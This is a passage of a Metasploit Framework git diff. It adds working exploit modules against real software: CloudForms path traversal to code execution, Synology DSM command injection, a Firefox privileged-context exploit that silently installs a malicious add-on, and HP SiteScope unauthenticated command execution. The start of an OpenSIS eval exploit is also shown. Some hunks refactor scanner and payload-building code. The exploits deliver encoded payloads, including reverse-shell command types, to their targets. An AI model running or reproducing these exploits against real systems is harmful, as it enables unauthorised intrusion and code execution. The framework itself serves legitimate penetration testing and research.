'8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02', - '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17', - '20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602', - '31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352', - '8353', '8366', '1090', '1095', '20201', '1099', '1089' + '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00', + '3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', + '3NN11', '3NN17' ] + + static_ports = [ + '21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299', + '3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200', + '8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004', + '20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604', + '2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366', + '1090', '1095', '20201', '1099', '1089' + ] + ports = [] # Build ports array from valid instance numbers @@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary final_ports << dport.gsub("NN", inst) end end - + final_ports.push(*static_ports) ports = final_ports if ports.empty? @@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary end print_good("#{ip}:#{port}\t - #{service} OPEN") -=begin - report_note(:host => "#{ip}", - :proto => 'TCP', - :port => "#{port}", - :type => 'SAP', - :data => "#{service}") -=end - + begin + report_note( + :host => "#{ip}", + :proto => 'TCP', + :port => "#{port}", + :type => 'SAP', + :data => "#{service}" + ) + end r << [ip,port,"open", service] rescue ::Rex::ConnectionRefused vprint_status("#{ip}:#{port}\t - TCP closed") diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index df7ef7a44f..eee8afd461 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary # this is needed on windows cause we send interface directly to Pcap functions @interface = get_interface_guid(@interface) @iface_ip = datastore['LOCALIP'] - @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces + @iface_ip ||= get_ipv4_addr(@interface) if netifaces raise "Interface IP is not defined and can not be guessed" unless @iface_ip # start with blank slate diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb new file mode 100644 index 0000000000..270fe2af3d --- /dev/null +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -0,0 +1,150 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal', + 'Description' => %q{ + This module exploits a path traversal vulnerability in the "linuxpkgs" + action of "agent" controller of the Red Hat CloudForms Management Engine 5.1 + (ManageIQ Enterprise Virtualization Manager 5.0 and earlier). + It uploads a fake controller to the controllers directory of the Rails + application with the encoded payload as an action and sends a request to + this action to execute the payload. Optionally, it can also upload a routing + file containing a route to the action. (Which is not necessary, since the + application already contains a general default route.) + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2068'], + ['CWE', '22'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=960422'] + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => true, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DisclosureDate' => 'Sep 4 2013', + 'DefaultOptions' => + { + 'PrependFork' => true, + 'SSL' => true + }, + 'DefaultTarget' => 0 + ) + + register_options( + [ + Opt::RPORT(443), + OptString.new('CONTROLLER', [false, 'The name of the controller']), + OptString.new('ACTION', [false, 'The name of the action']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ]) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('ROUTES', [true, 'Upload a routing file. Warning: It is not necessary by default and can damage the target application', false]), + ], self.class) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "ping.html") + ) + + if res and res.code == 200 and res.body.to_s =~ /EVM ping response/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Unknown + end + + def exploit + controller = + if datastore['CONTROLLER'].blank? + Rex::Text.rand_text_alpha_lower(rand(9) + 3) + else + datastore['CONTROLLER'].downcase + end + + action = + if datastore['ACTION'].blank? + Rex::Text.rand_text_alpha_lower(rand(9) + 3) + else + datastore['ACTION'].downcase + end + + data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n" + + print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...") + res = upload_file("../../app/controllers/#{controller}_controller.rb", data) + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + register_files_for_cleanup("app/controllers/#{controller}_controller.rb") + # According to rcvalle, all the version have not been checked + # so we're not sure if res.code will be always 500, in order + # to not lose sessions, just print warning and proceeding + unless res and res.code == 500 + print_warning("Unexpected reply but proceeding anyway...") + end + + if datastore['ROUTES'] + data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n" + + print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...") + res = upload_file("../../config/routes.rb", data) + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + # According to rcvalle, all the version have not been checked + # so we're not sure if res.code will be always 500, in order + # to not lose sessions, just print warning and proceeding + unless res and res.code == 500 + print_warning("Unexpected reply but proceeding anyway...") + end + end + + print_status("Sending execute request to #{target_url(controller, action)}...") + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, controller, action) + ) + end + + def upload_file(filename, data) + res = send_request_cgi( + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), + 'filename' => filename, + 'md5' => Rex::Text.md5(data) + } + ) + + return res + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end +end + diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb new file mode 100644 index 0000000000..5ed6644527 --- /dev/null +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -0,0 +1,163 @@ +## +## This module requires Metasploit: http//metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + DEVICE_INFO_PATTERN = /major=(?\d+)&minor=(?\d+)&build=(?\d+) + &junior=\d+&unique=synology_\w+_(?[^&]+)/x + + def initialize(info={}) + super(update_info(info, + 'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Synology DiskStation Manager (DSM) + versions 4.x, which allows the execution of arbitrary commands under root + privileges. + The vulnerability is located in /webman/imageSelector.cgi, which allows to append + arbitrary data to a given file using a so called SLICEUPLOAD functionality, which + can be triggered by an unauthenticated user with a specially crafted HTTP request. + This is exploited by this module to append the given commands to /redirect.cgi, + which is a regular shell script file, and can be invoked with another HTTP request. + Synology reported that the vulnerability has been fixed with versions 4.0-2259, + 4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable. + }, + 'Author' => + [ + 'Markus Wulftange' # Discovery, Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6955' ], + [ 'OSVDB', '101247' ] + ], + 'Privileged' => false, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 0x31337, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl telnet', + } + }, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Oct 31 2013' + )) + + register_options( + [ + Opt::RPORT(5000) + ], self.class) + end + + def check + print_status("#{peer} - Trying to detect installed version") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('webman', 'info.cgi'), + 'vars_get' => { 'host' => ''} + }) + + if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN + version = "#{$~[:major]}.#{$~[:minor]}" + build = $~[:build] + model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } + model = "DS#{model}" unless model =~ /^[A-Z]/ + else + print_status("#{peer} - Detection failed") + return Exploit::CheckCode::Unknown + end + + print_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + + case version + when '4.0' + return Exploit::CheckCode::Vulnerable if build < '2259' + when '4.1' + return Exploit::CheckCode::Vulnerable + when '4.2' + return Exploit::CheckCode::Vulnerable if build < '3243' + when '4.3' + return Exploit::CheckCode::Vulnerable if build < '3810' + return Exploit::CheckCode::Detected if build == '3810' + end + + Exploit::CheckCode::Safe + end + + def exploit + cmds = [ + # sed is used to restore the redirect.cgi + "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi", + payload.encoded + ].join("\n") + + mime_msg = Rex::MIME::Message.new + mime_msg.add_part('login', nil, nil, 'form-data; name="source"') + mime_msg.add_part('logo', nil, nil, 'form-data; name="type"') + + # unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n, + # so we use a placeholder and replace it later + cmd_placeholder = Rex::Text::rand_text_alphanumeric(10) + mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil, + 'form-data; name="foo"; filename="bar"') + + post_body = mime_msg.to_s + post_body.strip! + post_body.sub!(cmd_placeholder, cmds) + + # fix multipart encoding + post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') + + # send request to append shell commands + print_status("#{peer} - Injecting the payload...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('webman', 'imageSelector.cgi'), + 'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}", + 'headers' => { + 'X-TYPE-NAME' => 'SLICEUPLOAD', + 'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi' + }, + 'data' => post_body + }) + + unless res and res.code == 200 and res.body.include?('error_noprivilege') + fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") + end + + # send request to invoke the injected shell commands + print_status("#{peer} - Executing the payload...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('redirect.cgi'), + }) + + # Read command output if cmd/unix/generic payload was used + if datastore['CMD'] + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") + end + + print_good("#{peer} - Command successfully executed") + print_line(res.body) + end + end +end + diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index a8a5e83750..0c6ae762b4 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote ); ?> eof - currencies_php = currencies_php.gsub(/^\t\t\t/, '') + currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd print_status("#{peer} - Searching currencies.php file from #{pwd}") diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb new file mode 100644 index 0000000000..234e87b0f0 --- /dev/null +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -0,0 +1,116 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Exploit::EXE + include Msf::Exploit::Remote::FirefoxAddonGenerator + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution', + 'Description' => %q{ + On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given + invalid input, would throw an exception that did not have an __exposedProps__ + property set. By re-setting this property on the exception object's prototype, + the chrome-based defineProperty method is made available. + + With the defineProperty method, functions belonging to window and document can be + overriden with a function that gets called from chrome-privileged context. From here, + another vulnerability in the crypto.generateCRMFRequest function is used to "peek" + into the context's private scope. Since the window does not have a chrome:// URL, + the insecure parts of Components.classes are not available, so instead the AddonManager + API is invoked to silently install a malicious plugin. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Mariusz Mlynski', # discovered CVE-2012-3993 + 'moz_bug_r_a4', # discovered CVE-2013-1710 + 'joev' # metasploit module + ], + 'DisclosureDate' => "Aug 6 2013", + 'References' => [ + ['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15) + ['OSVDB', '86111'], + ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'], + ['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23) + ['OSVDB', '96019'] + ], + 'BrowserRequirements' => { + :source => 'script', + :ua_name => HttpClients::FF, + :ua_ver => lambda { |ver| ver.to_i.between?(5, 15) } + } + )) + + register_options([ + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) + ], self.class) + end + + def on_request_exploit(cli, request, target_info) + if request.uri.match(/\.xpi$/i) + print_status("Sending the malicious addon") + send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' }) + else + print_status("Sending HTML") + send_response_html(cli, generate_html(target_info)) + end + end + + def generate_html(target_info) + injection = if target_info[:ua_ver].to_i == 15 + "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);" + else + "p2.constructor.defineProperty(obj,key,{get:runme});" + end + + %Q| + + + #{datastore['CONTENT']} + + + + + | + end +end diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index 5c05cd2fd0..fde97006f6 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE + include Msf::Exploit::Remote::FirefoxAddonGenerator def initialize( info = {} ) super( update_info( info, @@ -36,55 +37,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ], [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ] ], - 'DisclosureDate' => 'Jun 27 2007', - 'Platform' => %w{ java linux osx solaris win }, - 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => - [ - [ 'Generic (Java Payload)', - { - 'Platform' => ['java'], - 'Arch' => ARCH_JAVA - } - ], - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], - [ 'Linux x86 (Native Payload)', - { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - } - ], - [ 'Mac OS X PPC (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_PPC, - } - ], - [ 'Mac OS X x86 (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_X86, - } - ] - ], - 'DefaultTarget' => 1 + 'DisclosureDate' => 'Jun 27 2007' )) - - register_options( [ - OptString.new('ADDONNAME', [ true, - "The addon name.", - "HTML5 Rendering Enhancements" - ]), - OptBool.new('AutoUninstall', [ true, - "Automatically uninstall the addon after payload execution", - true - ]) - ], self.class) end def on_request_uri( cli, request ) @@ -100,6 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote return end + # If we haven't returned yet, then this is a request for our xpi, + # so build one p = regenerate_payload(cli) if not p print_error("Failed to generate the payload.") @@ -109,114 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote return end - # If we haven't returned yet, then this is a request for our xpi, - # so build one - - if target.name == 'Generic (Java Payload)' - jar = p.encoded_jar - jar.build_manifest(:main_class => "metasploit.Payload") - payload_file = jar.pack - payload_name='payload.jar' - payload_script=%q| - var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java - java.lang.System.setSecurityManager(null); - var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); - var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]); - m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); - | - else - payload_file = generate_payload_exe - payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe' - payload_script=%q| - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(tmp); - process.run(false,[],0); - | - if target.name != 'Windows x86 (Native Payload)' - payload_script = %q| - var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); - chmod.initWithPath("/bin/chmod"); - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(chmod); - process.run(true, ["+x", tmp.path], 2); - | + payload_script - end - end - - zip = Rex::Zip::Archive.new - xpi_guid = Rex::Text.rand_guid - bootstrap_script = %q| -function startup(data, reason) { - var file = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("ProfD", Components.interfaces.nsIFile); - file.append("extensions"); - | - bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| - bootstrap_script << %Q|payload_name="#{payload_name}";| - bootstrap_script << %q| - file.append(xpi_guid); - file.append(payload_name); - var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("TmpD", Components.interfaces.nsIFile); - tmp.append(payload_name); - tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); - file.copyTo(tmp.parent, tmp.leafName); - | - bootstrap_script << payload_script - - if (datastore['AutoUninstall']) - bootstrap_script << %q| - try { // Fx < 4.0 - Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); - } catch (e) {} - try { // Fx 4.0 and later - Components.utils.import("resource://gre/modules/AddonManager.jsm"); - AddonManager.getAddonByID(xpi_guid, function(addon) { - addon.uninstall(); - }); - } catch (e) {} - | - end - - bootstrap_script << "}" - - zip.add_file('bootstrap.js', bootstrap_script) - zip.add_file(payload_name, payload_file) - zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") - zip.add_file('install.rdf', %Q| - - - #{xpi_guid} - #{datastore['ADDONNAME']} - 1.0 - true - true - - - toolkit@mozilla.org - 1.0 - * - - - - - {ec8030f7-c20a-464f-9b0e-13a3a9e97384} - 1.0 - * - - - -|) -zip.add_file('overlay.xul', %q| - - -|) - print_status("Sending xpi and waiting for user to click 'accept'...") - send_response( cli, zip.pack, { 'Content-Type' => 'application/x-xpinstall' } ) + send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } ) handler( cli ) end diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index 6ec63813e2..6562ba8644 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') return html end diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index d3c9d2800f..2c7a1efb27 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote send_not_found(cli) return end - content.gsub!(/^\t{4}/, '') + content.gsub!(/^ {8}/, '') content.gsub!(/\t/, ' ') send_response_html(cli, content, headers) diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index df50dc1019..f4fe327e7b 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -17,11 +17,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass', 'Description' => %q{ - Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can - by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that - can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing - authentication on the admin web interface which then could lead to arbitrary code execution. - Tested on Windows and Linux with ColdFusion 9. + Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote + attackers to bypass authentication using the RDS component. Due to + default settings or misconfiguration, its password can be set to an + empty value. This allows an attacker to create a session via the RDS + login that can be carried over to the admin web interface even though + the passwords might be different, and therefore bypassing authentication + on the admin web interface leading to arbitrary code execution. Tested + on Windows and Linux with ColdFusion 9. }, 'Author' => [ diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb new file mode 100644 index 0000000000..221ed08964 --- /dev/null +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -0,0 +1,164 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include REXML + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP SiteScope issueSiebelCmd Remote Code Execution', + 'Description' => %q{ + This module exploits a code execution flaw in HP SiteScope. The vulnerability exists in the + APISiteScopeImpl web service, specifically in the issueSiebelCmd method, which allows the + user to execute arbitrary commands without authentication. This module has been tested + successfully on HP SiteScope 11.20 over Windows 2003 SP2, Windows 2008 and CentOS 6.5. + }, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-4835'], + [ 'OSVDB', '99230' ], + [ 'BID', '63478' ], + [ 'ZDI', '13-263' ] + ], + 'Privileged' => true, + 'Platform' => %w{ win unix }, + 'Arch' => [ ARCH_X86, ARCH_CMD ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'HP SiteScope 11.20 / Windows', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'HP SiteScope 11.20 / Linux', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'BadChars' => "\x20\x22\x27\x3c", + 'Compat' => { + 'RequiredCmd' => 'perl python bash-tcp gawk openssl' + } + } + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 30 2013')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) + ], self.class) + end + + def check + value = rand_text_alpha(8 + rand(10)) + + res = send_soap_request(value) + + if res and res.code == 500 and res.body.to_s =~ /Cmd Error: User and Password must be specified/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + + if target.name =~ /Windows/ + print_status("#{peer} - Delivering payload...") + # cmd.exe max length is 8192 + execute_cmdstager({:linemax => 8000, :nodelete => true}) + elsif target.name =~ /Linux/ + print_status("#{peer} - Executing payload...") + execute_command(payload.encoded, {:http_timeout => 1}) + end + end + + def execute_command(cmd, opts={}) + if target.name =~ /Windows/ + cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")") + command = "cmd.exe /c " + command << cmd.gsub(/&/, "&") # HTML Encode '&' character to avoid soap request parsing errors + command << " & /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing + elsif target.name =~ /Linux/ + command = "sh -c " + command << cmd.gsub(/&/, "&") # HTML Encode '&' character to avoid soap request parsing errors + command << " /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing + end + + res = send_soap_request(command, opts[:http_timeout] || 20) + + return if target.name =~ /Linux/ # There isn't response with some ARCH_CMD payloads + + unless res and res.code == 500 and res.body =~ /SiteScope encountered an error associated with running a command/ + fail_with(Failure::Unknown, "#{peer} - Unexpected response, aborting...") + end + end + + def get_soap_request + xml = Document.new + xml.add_element( + "soapenv:Envelope", + { + 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", + 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", + 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", + 'xmlns:api' => "http://Api.freshtech.COM" + }) + xml.root.add_element("soapenv:Header") + xml.root.add_element("soapenv:Body") + body = xml.root.elements[2] + body.add_element( + "api:issueSiebelCmd", + { + 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" + }) + ser = body.elements[1] + ser.add_element("in0", {'xsi:type' => 'xsd:string'}) + ser.elements['in0'].text = "MSF_COMMAND" + + xml.to_s + end + + def send_soap_request(command, timeout = 20) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'services', 'APISiteScopeImpl'), + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => get_soap_request.gsub(/MSF_COMMAND/, command), # To avoid rexml html encoding + 'headers' => { + 'SOAPAction' => '""' + } + }, timeout) + + return res + end + +end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index e993e72f42..27b4c3b6da 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote exec("#{fname}"); ?> | - php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') + php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ') return php end diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 1d7fa82daa..027144e742 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -98,6 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote :msfmodule => self, :port => port, :disable_agent => true, + :config => false, :password => pass } diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index 3071fa24f1..b7de8a41ba 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML # remove the extra tabs - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name}") send_response_html(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb new file mode 100644 index 0000000000..6db0c66ab7 --- /dev/null +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -0,0 +1,159 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "OpenSIS 'modname' PHP Code Execution", + 'Description' => %q{ + This module exploits a PHP code execution vulnerability in OpenSIS + versions 4.5 to 5.2 which allows any authenticated user to execute + arbitrary PHP code under the context of the web-server user. + The 'ajax.php' file calls 'eval()' with user controlled data from + the 'modname' parameter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'EgiX', # Discovery + 'Brendan Coles ' # msf exploit + ], + 'References' => + [ + ['CVE', '2013-1349'], + ['OSVDB', '100676'], + ['URL', 'http://karmainsecurity.com/KIS-2013-10'], + ['URL', 'http://sourceforge.net/p/opensis-ce/bugs/59/'] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python', + } + }, + 'DefaultOptions' => + { + 'ExitFunction' => 'none' + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + # Tested on OpenSIS versions 4.9 and 5.2 (Ubuntu Linux) + ['OpenSIS version 4.5 to 5.2', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 04 